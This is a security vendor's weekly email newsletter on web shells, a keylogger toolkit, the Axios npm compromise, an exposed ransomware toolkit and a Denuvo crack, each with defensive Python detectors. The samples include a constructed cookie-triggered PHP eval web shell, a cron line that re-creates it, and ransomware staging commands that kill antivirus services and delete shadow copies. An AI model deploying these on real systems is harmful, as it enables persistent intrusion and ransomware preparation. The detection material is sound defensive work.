
In this week's roundup, we cover: Microsoft's detailed breakdown of cookie-controlled PHP web shells that use cron jobs to recreate themselves on Linux servers after cleanup; a custom two-piece malware toolkit, a modular backdoor paired with a keystroke-capturing DLL, used against a South Asian financial firm; North Korea-linked threat actors hijacking the Axios npm account to push RAT malware to the millions of downstream projects that depend on it; a misconfigured server that exposed the complete operational toolkit of a TheGentlemen ransomware affiliate, including victim credentials and pre-encryption scripts; and a game piracy technique that weaponizes a hypervisor to crack Denuvo DRM while stripping away the core Windows protections that keep servers and infrastructure safe. Read on!


Microsoft Details Cookie-Controlled PHP Web Shells Persisting via Cron on Linux Servers

Microsoft's Defender Security Research Team has pulled back the curtain on a particularly cunning class of PHP-based web shells targeting Linux servers. Instead of the obvious approach of passing commands in URL parameters, the operators bury the execution logic in HTTP cookie values, so the shell sits completely dormant during normal traffic and springs to life only when a specific cookie is present. A cron job recreates the PHP loader automatically after cleanup, so even a successful remediation is quietly undone in the background. Separating the re-creation function from the execution trigger keeps observable indicators to a minimum and lets the activity blend into routine application logs.
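Both halves of that design leave something to hunt for: PHP that feeds cookie data into an execution sink, and a cron entry that writes a .php file into a web root. The Python below is an added example, not Microsoft's tooling or samples. The PHP file, the crontab lines, the base64 loader and the paths are constructed for illustration, and the regexes are assumptions that a defender would extend for their own stack.

```python
import base64
import re

# Constructed sample PHP file in the shape the report describes: nothing runs on an
# ordinary request, but a specific cookie is decoded and evaluated. The contents are
# invented for this example; they are not Microsoft's sample.
SAMPLE_PHP = r'''<?php
if (isset($_COOKIE["sess_id"])) {
    @eval(base64_decode($_COOKIE["sess_id"]));
}
'''

# Constructed crontab: a benign certbot entry, plus a job that rewrites a cookie-keyed
# PHP loader into the web root every five minutes (the "self-healing" re-creation step).
LOADER_B64 = base64.b64encode(b'<?php @eval($_COOKIE["c"]); ?>').decode()
SAMPLE_CRONTAB = f"""\
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * echo '{LOADER_B64}' | base64 -d > /var/www/html/wp-content/uploads/cache.php
"""

REQUEST_INPUT = re.compile(r"\$_(COOKIE|REQUEST|POST|GET|SERVER)\b")
EXEC_SINK = re.compile(
    r"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open|create_function)\s*\("
)
DECODER = re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13|hex2bin)\s*\(")


def suspicious_php(source, window=3):
    """Return (lineno, reason) pairs where request-controlled data reaches an
    execution sink within `window` lines of being read."""
    findings = []
    last_input = None   # line on which a request superglobal was last read
    last_kind = None    # "cookie" or "request", for the reason text
    for lineno, line in enumerate(source.splitlines(), 1):
        if REQUEST_INPUT.search(line):
            last_input = lineno
            last_kind = "cookie" if "$_COOKIE" in line else "request"
        if EXEC_SINK.search(line) and last_input is not None and lineno - last_input < window:
            decoded = " (decoded first)" if DECODER.search(line) else ""
            findings.append((lineno, f"{last_kind}-controlled data reaches execution sink{decoded}"))
    return findings


CRON_WRITES_PHP = re.compile(r"(>>?|\btee\b)\s*\S*\.php\b")
CRON_DECODES = re.compile(r"\b(base64\s+(-d|--decode)|xxd\s+-r|printf|echo\s+-e)\b")
CRON_FETCHES = re.compile(r"\b(curl|wget)\b")
WEB_ROOTS = re.compile(r"/var/www/|/srv/www/|/usr/share/nginx/|/html/")


def suspicious_cron(crontab):
    """Return (lineno, reasons) for cron lines that look like web-shell re-creation."""
    findings = []
    for lineno, line in enumerate(crontab.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        reasons = []
        if CRON_WRITES_PHP.search(line):
            reasons.append("writes a .php file")
        if CRON_DECODES.search(line) and WEB_ROOTS.search(line):
            reasons.append("decodes embedded content into a web root")
        if CRON_FETCHES.search(line) and WEB_ROOTS.search(line):
            reasons.append("downloads into a web root")
        if reasons:
            findings.append((lineno, reasons))
    return findings


if __name__ == "__main__":
    for hit in suspicious_php(SAMPLE_PHP):
        print("PHP  line %d: %s" % hit)
    for lineno, reasons in suspicious_cron(SAMPLE_CRONTAB):
        print("CRON line %d: %s" % (lineno, ", ".join(reasons)))
```

In practice you would run `suspicious_cron` over every crontab (`/etc/crontab`, `/etc/cron.d/*`, and each user's `crontab -l`) and `suspicious_php` over the web root, and treat a hit in both as the paired mechanism described above; cleaning the PHP file alone is exactly the remediation the cron job is designed to undo.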


Austin Gadient, CTO & Cofounder:

"Ransomware doesn't start with encryption. Threat actors go to great lengths to set up their ransomware before it detonates. These steps often involve disabling security software, shutting down applications, and tampering with recovery capabilities."

On "Exposed Server Reveals TheGentlemen Ransomware Toolkit, Victim Credentials, and Ngrok Tokens"


Hackers Target South Asian Financial Firm with BRUSHWORM and BRUSHLOGGER Attacks

Researchers investigating a breach at a South Asian financial institution uncovered a custom two-piece malware toolkit built by what appears to be an inexperienced but actively developing threat actor. BRUSHWORM, a modular backdoor disguised as paint.exe, handles persistence, C2, USB-based worm propagation, and bulk theft of documents, spreadsheets, email archives, and source code. It is paired with BRUSHLOGGER, a DLL side-loaded keylogger masquerading as libcurl.dll that captures system-wide keystrokes with per-window context and timestamps, then XOR-encrypts the logs with a static key.
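A static XOR key is the part of that design an analyst can turn against the logger: because every log line shares a predictable fragment (a window-context header), a known-plaintext crib drag recovers the key and decrypts the whole capture. The Python below is an added example, not code from the investigation; the log format, the key, and the crib string are all constructed here, since the real BRUSHLOGGER format and key are not on the page.

```python
def xor_bytes(data, key):
    """Repeating-key XOR; the operation is its own inverse."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# Constructed keylog with the elements the summary lists (timestamp, window context,
# keystrokes). The key is invented for the example.
PLAINTEXT = (
    b"[2024-06-01 09:12:44] [Window: Outlook - Inbox]\n"
    b"hello team, the wire transfer is approved\n"
    b"[2024-06-01 09:13:10] [Window: Internet Banking]\n"
    b"username: jdoe<TAB>password: Spr1ng!2024<ENTER>\n"
)
STATIC_KEY = b"\x5a\x13\xc7\x88\x2e"
CIPHERTEXT = xor_bytes(PLAINTEXT, STATIC_KEY)


def recover_key(ciphertext, crib, max_keylen=16):
    """Crib-drag a known plaintext fragment across the ciphertext.

    For each candidate key length and offset, derive the key bytes the crib implies
    and accept the first candidate where the crib is consistent with a single key.
    The crib must cover the key at least twice so that every key byte is checked
    against two plaintext positions, which rules out chance matches.
    Returns (key, offset) or None."""
    for keylen in range(1, min(max_keylen, len(crib) // 2) + 1):
        for off in range(len(ciphertext) - len(crib) + 1):
            key = bytearray(keylen)
            seen = [False] * keylen
            consistent = True
            for i, c in enumerate(crib):
                k = (off + i) % keylen       # key byte indexed by absolute position
                kb = c ^ ciphertext[off + i]
                if seen[k] and key[k] != kb:
                    consistent = False
                    break
                key[k], seen[k] = kb, True
            if consistent and all(seen):
                return bytes(key), off
    return None


def decrypt_log(ciphertext, crib=b"] [Window: "):
    """Recover the key from the window-context header and decode the whole log."""
    found = recover_key(ciphertext, crib)
    if found is None:
        return None
    key, _ = found
    return xor_bytes(ciphertext, key).decode("utf-8", errors="replace")


if __name__ == "__main__":
    key, offset = recover_key(CIPHERTEXT, b"] [Window: ")
    print("key %s recovered from crib at offset %d" % (key.hex(), offset))
    print(decrypt_log(CIPHERTEXT))
```

The same routine works on any artifact encrypted with a fixed repeating key once one fragment of plaintext is known; on a real capture the crib would be whatever header or delimiter the logger writes on every entry, and the recovered key can then be used to decrypt every other log file the same build produced.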


Attackers Hijack Axios npm Account to Spread RAT Malware

When threat actors compromised the npm maintainer account behind Axios, one of the most widely used JavaScript libraries on the planet with over 400 million monthly downloads, they published two malicious versions within an hour. The rogue releases injected a hidden dependency called plain-crypto-js that deployed a cross-platform remote access trojan on macOS, Windows, and Linux. It used obfuscation to stay hidden, ran automatically through post-install scripts, deleted its own traces so the infected library appeared clean, and quietly communicated with a command-and-control server before security researchers caught the rogue updates.
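Two things in that chain are visible in a lockfile before any code runs: a transitive dependency that was not there before, and a package that carries install scripts (npm records these as `hasInstallScript` in lockfile v2/v3). The Python below is an added example of a lockfile gate, not code from the Axios project or from the researchers who caught the update. The lockfile fragments, versions, tarball URLs and the policy are constructed for illustration; only the dependency name plain-crypto-js comes from the summary.

```python
import json

# Constructed package-lock.json "packages" maps (lockfileVersion 3) before and after
# a routine update. Versions and URLs are placeholders, not the real malicious releases.
LOCK_BEFORE = json.loads("""{
  "lockfileVersion": 3,
  "packages": {
    "": {"dependencies": {"axios": "^1.0.0"}},
    "node_modules/axios": {
      "version": "1.0.0",
      "resolved": "https://registry.npmjs.org/axios/-/axios-1.0.0.tgz"
    }
  }
}""")

LOCK_AFTER = json.loads("""{
  "lockfileVersion": 3,
  "packages": {
    "": {"dependencies": {"axios": "^1.0.0"}},
    "node_modules/axios": {
      "version": "1.0.1",
      "resolved": "https://registry.npmjs.org/axios/-/axios-1.0.1.tgz",
      "dependencies": {"plain-crypto-js": "*"}
    },
    "node_modules/plain-crypto-js": {
      "version": "0.0.1",
      "resolved": "https://registry.npmjs.org/plain-crypto-js/-/plain-crypto-js-0.0.1.tgz",
      "hasInstallScript": true
    }
  }
}""")

TRUSTED_REGISTRY = "https://registry.npmjs.org/"


def lock_packages(lock):
    """The installed package map, minus the root project entry ("")."""
    return {path: meta for path, meta in lock.get("packages", {}).items() if path}


def diff_lock(before, after):
    """Compare two lockfiles and report what a supply-chain reviewer wants to see:
    new packages, version changes, packages with install hooks, and tarballs that
    resolve outside the trusted registry."""
    old, new = lock_packages(before), lock_packages(after)
    added = sorted(set(new) - set(old))
    changed = sorted(
        p for p in new if p in old and new[p].get("version") != old[p].get("version")
    )
    install_scripts = sorted(p for p in new if new[p].get("hasInstallScript"))
    off_registry = sorted(
        p for p in new
        if not new[p].get("resolved", TRUSTED_REGISTRY).startswith(TRUSTED_REGISTRY)
    )
    return {
        "added": added,
        "changed": changed,
        "install_scripts": install_scripts,
        "new_with_install_scripts": sorted(set(added) & set(install_scripts)),
        "off_registry": off_registry,
    }


def should_block(report):
    """Assumed policy: refuse the update when a newly introduced package runs install
    scripts or when any package resolves outside the trusted registry."""
    return bool(report["new_with_install_scripts"] or report["off_registry"])


if __name__ == "__main__":
    report = diff_lock(LOCK_BEFORE, LOCK_AFTER)
    print(json.dumps(report, indent=2))
    print("BLOCK" if should_block(report) else "ALLOW")
```

A gate like this only helps if installs are reproducible from the lockfile, so pair it with `npm ci` in CI rather than `npm install`, and with `--ignore-scripts` where the project can tolerate it, so that a post-install hook never gets to run before a human has looked at the diff.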


Exposed Server Reveals TheGentlemen Ransomware Toolkit, Victim Credentials, and Ngrok Tokens

Hunt.io researchers stumbled onto something rare: a misconfigured server on the Russian bulletproof hosting provider Proton66 left the complete operational toolkit of a TheGentlemen ransomware affiliate open and unauthenticated for at least 24 days. The exposure covered 126 files across 18 subdirectories, including harvested victim credentials, plaintext ngrok authentication tokens, and Mimikatz credential dump logs. The crown jewel of the directory is z1.bat, a 35-kilobyte batch script that consolidates every pre-encryption preparation step into a single execution and systematically kills security tools from over a dozen vendors, including Sophos, Kaspersky, and ESET.
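Austin Gadient's point above, that ransomware is staged before it detonates, and the z1.bat description are the kind of thing a detection engineer turns into a rule: a script that kills security tools, stops applications and tampers with recovery produces a burst of distinctive process creations on one host in a short window. The Python below is an added example, not code from Hunt.io or from the exposed toolkit. It classifies command lines into those three staging behaviours and alerts when a host shows two or more within ten minutes. The events, host names, process and service names are constructed; the vendor keyword lists and thresholds are assumptions a team would tune to its own estate.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation events: (timestamp, host, command line). Host names
# and process/service names are invented; none of this is from the exposed server.
EVENTS = [
    ("2024-06-01T03:00:01", "FS01", "taskkill /F /IM SophosAgent.exe"),
    ("2024-06-01T03:00:03", "FS01", 'net stop "Kaspersky Security Service" /y'),
    ("2024-06-01T03:00:05", "FS01", 'sc stop "ESET Service"'),
    ("2024-06-01T03:00:09", "FS01", "vssadmin delete shadows /all /quiet"),
    ("2024-06-01T03:00:12", "FS01", "bcdedit /set {default} recoveryenabled no"),
    ("2024-06-01T03:00:20", "FS01", "net stop MSSQLSERVER /y"),
    ("2024-06-01T09:14:00", "WS07", "net stop Spooler"),
    ("2024-06-01T09:15:00", "WS07", "taskkill /F /IM notepad.exe"),
]

# Assumed patterns per staging behaviour: a verb regex plus, where needed, a target regex.
STOP_VERB = re.compile(
    r"\b(taskkill|sc(\.exe)?\s+(stop|delete|config)|net(\.exe)?\s+stop|Stop-Service|Set-MpPreference)\b",
    re.I,
)
SECURITY_TARGET = re.compile(
    r"sophos|kaspersky|eset|defender|msmpeng|sentinel|crowdstrike|carbonblack|mcafee|"
    r"trend\s*micro|bitdefender|symantec|malwarebytes|cylance|disablerealtimemonitoring",
    re.I,
)
APP_TARGET = re.compile(r"sql|oracle|exchange|veeam|backup|postgres|mysql|outlook", re.I)
RECOVERY_TAMPER = re.compile(
    r"vssadmin\s+delete\s+shadows|wmic\s+shadowcopy\s+delete|wbadmin\s+delete\s+catalog|"
    r"bcdedit\s+.*?(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)",
    re.I,
)

CATEGORIES = {
    "disable_security": (STOP_VERB, SECURITY_TARGET),
    "stop_applications": (STOP_VERB, APP_TARGET),
    "tamper_recovery": (RECOVERY_TAMPER, None),
}


def classify(cmdline):
    """Staging behaviours a single command line exhibits (empty list if none)."""
    return [
        name
        for name, (verb, target) in CATEGORIES.items()
        if verb.search(cmdline) and (target is None or target.search(cmdline))
    ]


def detect_staging(events, window_minutes=10, min_categories=2):
    """Alert once per host when at least `min_categories` distinct staging
    behaviours occur within `window_minutes`; a lone 'net stop' does not fire."""
    by_host = defaultdict(list)
    for ts, host, cmd in events:
        cats = classify(cmd)
        if cats:
            by_host[host].append((datetime.fromisoformat(ts), cats, cmd))
    alerts = []
    for host, hits in by_host.items():
        hits.sort(key=lambda h: h[0])
        for i, (t0, _, _) in enumerate(hits):
            in_window = [h for h in hits[i:] if h[0] - t0 <= timedelta(minutes=window_minutes)]
            cats = sorted({c for _, cs, _ in in_window for c in cs})
            if len(cats) >= min_categories:
                alerts.append({"host": host, "start": t0.isoformat(), "categories": cats,
                               "commands": [h[2] for h in in_window]})
                break  # one alert per host, carrying the full command list for the SOC
    return alerts


if __name__ == "__main__":
    for alert in detect_staging(EVENTS):
        print(alert["host"], alert["start"], ", ".join(alert["categories"]))
        for cmd in alert["commands"]:
            print("   ", cmd)
```

Requiring two behaviours in one window is what keeps the rule quiet on an administrator restarting a service, while still catching a consolidated script such as z1.bat, which produces all three in seconds. The alert fires before encryption starts, which is the only moment at which an isolation response still prevents data loss.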


Cracking Denuvo games in Windows just got easier—and Insanely Dangerous

Game pirates looking to crack Denuvo DRM have stumbled onto something security professionals have long warned about. They deploy a hypervisor that runs beneath the Windows operating system to intercept CPU instructions directly and bypass the encrypted server handshakes Denuvo depends on. Doing so requires users to disable Secure Boot and strip away core Windows protections, which creates exactly the kind of below-OS attack surface that ransomware operators and other threat actors actively exploit. The irony is striking enough that even members of the piracy community are publicly refusing to use the technique out of fear of the vulnerabilities it introduces at the hypervisor layer.


Thanks for reading! Feel free to share this email with your network, and for more hypervisor and Linux cybersecurity updates, visit valicyber.com.



Vali Cyber, Inc., 529 Rookwood Place, Charlottesville, VA 22903, USA
